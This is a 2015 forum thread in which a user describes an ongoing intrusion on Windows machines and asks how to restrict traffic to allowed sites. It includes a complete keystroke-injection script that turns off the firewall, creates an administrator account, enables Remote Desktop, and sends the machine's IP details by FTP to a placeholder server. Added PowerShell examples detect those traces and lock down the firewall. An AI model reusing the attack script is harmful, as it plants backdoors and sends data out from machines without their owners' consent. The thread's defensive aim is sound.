meows Posted March 27, 2015

I owned an internet service provider for a number of years, and in 1996 some guys from Russia and China came calling, with a brief appearance from a group in Sweden of all places. It was a 6-month battle. Short for a war, but after much grief on both sides I was able to remove the swine and cast them over the cliffs to their death. Yes, it was a Windows NT Server farm and I had just started moving to Unix. Now, with just a couple of XP and Win7 boxes, I play around with things to attempt to keep my brain from stagnating, although my daughter says it is way too late to prevent that.

The issue is that something got through many layers of firewalls, virus and malware programs. I thought I had cast it asunder at least 10 times now. However, 10 minutes ago I saw changes in my Monitor folder/drive: "Windows Trusted Installer has determined ..." and then a few seconds later a new NTDmini.DAT file is generated. Now, after trying to log port sniffers and TCP/UDP endpoints and so on, it is very hard to see anything when there are over 200 people hitting your computer within a second or two. The only thing I have found that helps is to block 65,000+ ports and only leave 6 to 12 ports open. The attackers' latest attempt was from hidden IP addresses:
233.216.xxx.xxx and a non-existent domain, www.niser.org

    ntdll.dll!RtlRegisterThreadWithCsrss+0x197 01A90000 01A8E000 00002000 7FFDD000 0025E414 0025E4BC
    -> 2015-03-24 11:12:57:072 2268 ef8 Misc = Module: C:\Windows\system32\
    DETAIL - 7 user registry handles leaked from \Registry\User\S-1-5-21-3132887318-2642499473-540075541-1000:
      Process 1340 (\Device\HarddiskVolume2\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3132887318-2642499473-540075541-1000\Software
    HKLM\SYSTEM\ControlSet001\Control\Session Manager
      PendingFileRenameOperations REG_MULTI_SZ \??\C:\Users\xxxxxx\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7}\fpb.tmp;;\??\C:\Users\xxxxxxx1\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7};;;
    3/26/2015 6:32:16 PM 171

Anyway, I am wondering how to stop all traffic other than traffic from a specific web page domain, or require an ALLOW for access to this content. I will kill this, but I want something to fight back with. There has to be a way to actually close a port and lock the darn door. Here is an example that this is happening.

Target: Windows 7
Description: Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file.

    REM Target: Windows 7 (keystroke-injection script as posted; one command per line)
    REM "username", "password", "ftp server", "login name" and "login password" are placeholders
    DELAY 2000
    ESCAPE
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    DELAY 400
    REM Ctrl+Shift+Enter launches cmd elevated; ALT y answers the UAC prompt
    CTRL-SHIFT ENTER
    DELAY 400
    STRING netsh firewall set opmode mode=disable
    ENTER
    DELAY 400
    ALT y
    ENTER
    DELAY 400
    REM create a local account and make it an administrator
    STRING net user /add username password
    ENTER
    DELAY 400
    STRING net localgroup administrators username /add
    ENTER
    DELAY 400
    REM enable Remote Desktop and make its service start automatically
    STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    ENTER
    DELAY 400
    STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    ENTER
    DELAY 400
    STRING sc config TermService start= auto
    ENTER
    DELAY 400
    STRING net start Termservice
    ENTER
    DELAY 400
    REM exfiltrate the machine's addresses over FTP, then remove the file
    STRING cd %USERPROFILE%
    ENTER
    DELAY 400
    STRING ipconfig /all > number.txt
    ENTER
    DELAY 400
    STRING ftp -i ftp server
    ENTER
    DELAY 400
    STRING login name
    ENTER
    DELAY 400
    STRING login password
    ENTER
    DELAY 600
    STRING prompt
    ENTER
    DELAY 400
    STRING prompt
    ENTER
    DELAY 400
    STRING PUT number.txt
    ENTER
    DELAY 2000
    STRING bye
    ENTER
    DELAY 400
    STRING del number.txt
    ENTER
    DELAY 400
    REM Alt+Space, c closes the cmd window
    ALT SPACE
    STRING c

So sorry, I know this is not anyone's problem. Unless it happens to you. The code posted is from a Gov admin that caught it after it was posted to a forum. There was some kind of stopping or disabling of the BFE service at the top of the script (I did not receive that part). He did test it and was blown away because it worked and he gained access to another department's computers. *so I was told* If there is something that can point me in the direction to restrict TCP/UDP, I would be grateful.
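The script in the post above leaves a small, fixed set of traces: the firewall turned off, Remote Desktop switched on, TermService set to auto-start, and a new member of the local Administrators group. The following is an added example (not from the original post or its author) that checks a Windows 7 or later host for exactly those traces. It assumes it is run from an elevated PowerShell prompt, that netsh prints English output, and that the `$ExpectedAdmins` list below is edited to match the accounts that are supposed to be administrators on the box.

```powershell
# Added example, not from the thread: look for what the posted keystroke script
# leaves behind. Run elevated. $ExpectedAdmins is an assumption; edit it.
$ExpectedAdmins = @('Administrator')
$findings = New-Object System.Collections.ArrayList

# 1. "netsh firewall set opmode mode=disable" turns the firewall off.
#    netsh output is locale dependent; "State  OFF" assumes an English system.
$fwState = netsh advfirewall show allprofiles state | Out-String
if ($fwState -match 'State\s+OFF') {
    [void]$findings.Add('Windows Firewall is OFF on at least one profile')
}

# 2. The two "reg add" lines in the script enable Remote Desktop.
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$ts = Get-ItemProperty -Path $tsKey
if ($ts.fDenyTSConnections -eq 0) {
    [void]$findings.Add("Remote Desktop is enabled (fDenyTSConnections=0 under $tsKey)")
}

# 3. "sc config TermService start= auto" / "net start TermService".
$svc = Get-WmiObject Win32_Service -Filter "Name='TermService'"
if ($svc -and $svc.StartMode -eq 'Auto') {
    [void]$findings.Add("TermService starts automatically (current state: $($svc.State))")
}

# 4. "net user /add" + "net localgroup administrators ... /add": list the
#    local Administrators group through ADSI (works on Windows 7 / PS 2.0).
$group = [ADSI]'WinNT://./Administrators,group'
$members = $group.psbase.Invoke('Members') | ForEach-Object {
    $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
}
foreach ($m in $members) {
    if ($ExpectedAdmins -notcontains $m) {
        [void]$findings.Add("Unexpected member of local Administrators: $m")
    }
}

# 5. Security log: 4720 = user account created, 4732 = member added to a local
#    group, 4950 = Windows Firewall setting changed. 4720/4732 need account
#    management auditing, which Windows 7 enables (Success) by default.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4720, 4732, 4950; StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $firstLine = ($e.Message -split "`r?`n")[0]
    [void]$findings.Add("Security event $($e.Id) at $($e.TimeCreated): $firstLine")
}

if ($findings.Count -eq 0) { 'No indicators of the posted script found.' }
else { $findings | ForEach-Object { "FINDING: $_" } }
```

The Administrators check is the one worth keeping even after the others are clean: the account the script creates survives a firewall re-enable and an RDP disable, and it is what the FTP'd `ipconfig` output is for.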
jvanegmond Posted March 27, 2015

Windows Firewall can do this out of the box if you go to advanced settings, but I presume you know that. When an attacker has arbitrary code execution on your machine, you're going to fight a losing battle. Keep them out in the first place on the network level. So if you're doing this kind of stuff, I honestly suggest buying a hardware firewall (with a decent IDS if you have the money) and letting that manage your DMZ. If it's just a hobby, look at owned stuff a few years old.

github.com/jvanegmond
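Something concrete for the "advanced settings" pointer above and for the first post's question about allowing only one site: the following is an added example, not code from either poster. It drives the same Windows Firewall through `netsh advfirewall` (Windows 7 and later; run elevated), sets the default to block in both directions, and then allows only DNS and TCP 80/443 to the addresses that the listed site names resolve to. The site name, the resolver address, the backup path and the rule-name prefix are all assumptions to edit.

```powershell
# Added example, not from the thread: Windows Firewall as an allow-list with
# netsh advfirewall. Run elevated. The four values below are assumptions.
$AllowedSites = @('example.com')        # assumption: the sites you still want to reach
$DnsServers   = @('192.0.2.53')         # assumption: your resolver (RFC 5737 test address)
$Backup       = 'C:\fw-before-lockdown.wfw'
$DryRun       = $true                   # $true prints the commands; $false applies them

# Rule names contain no spaces on purpose, so no quoting is needed for netsh.
function Invoke-Fw([string[]]$NetshArgs) {
    if ($DryRun) { 'netsh ' + ($NetshArgs -join ' ') }
    else { & netsh $NetshArgs }
}

# 0. Keep the current policy so the lockdown can be undone with
#    "netsh advfirewall import <file>".
Invoke-Fw @('advfirewall', 'export', $Backup)

# 1. Firewall on for every profile; default block in both directions.
#    "blockinbound" still honours existing inbound allow rules; use
#    "blockinboundalways" to ignore them as well.
Invoke-Fw @('advfirewall', 'set', 'allprofiles', 'state', 'on')
Invoke-Fw @('advfirewall', 'set', 'allprofiles', 'firewallpolicy', 'blockinbound,blockoutbound')

# 2. Rules match IP addresses, never domain names, so DNS has to be allowed
#    first and every site name resolved to the addresses it uses right now.
Invoke-Fw @('advfirewall', 'firewall', 'add', 'rule', 'name=AllowList-DNS', 'dir=out',
            'action=allow', 'protocol=UDP', 'remoteport=53',
            "remoteip=$($DnsServers -join ',')")

foreach ($site in $AllowedSites) {
    $ips = [System.Net.Dns]::GetHostAddresses($site) |
           Where-Object { $_.AddressFamily -eq 'InterNetwork' } |
           ForEach-Object { $_.IPAddressToString }
    if (-not $ips) { Write-Warning "no IPv4 address for $site; skipping"; continue }
    $name = "AllowList-$site"
    # delete-then-add so re-running the script refreshes a changed address list
    Invoke-Fw @('advfirewall', 'firewall', 'delete', 'rule', "name=$name")
    Invoke-Fw @('advfirewall', 'firewall', 'add', 'rule', "name=$name", 'dir=out',
                'action=allow', 'protocol=TCP', 'remoteport=80,443',
                "remoteip=$($ips -join ',')")
}

# 3. Nothing is added inbound: with the default at block, every listening port
#    is closed from the outside, which is what "lock the door" amounts to here.
```

Run it once with `$DryRun = $true` and read the commands; `netsh advfirewall firewall show rule name=all` afterwards confirms what got applied. Two caveats match the reply above: a site behind a CDN changes addresses, so the resolve-and-add step has to be re-run (a scheduled task is the usual answer), and the posted keystroke script's `netsh firewall set opmode mode=disable` undoes all of this in one line, which is why an attacker who already has an elevated prompt cannot be kept out by the host's own firewall. One more point about the address in the first post: 233.0.0.0/8 lies inside the IPv4 multicast range (224.0.0.0/4), so a 233.216.x.x address cannot be the source of a TCP connection, and a `remoteip` block rule for it would never match anything useful.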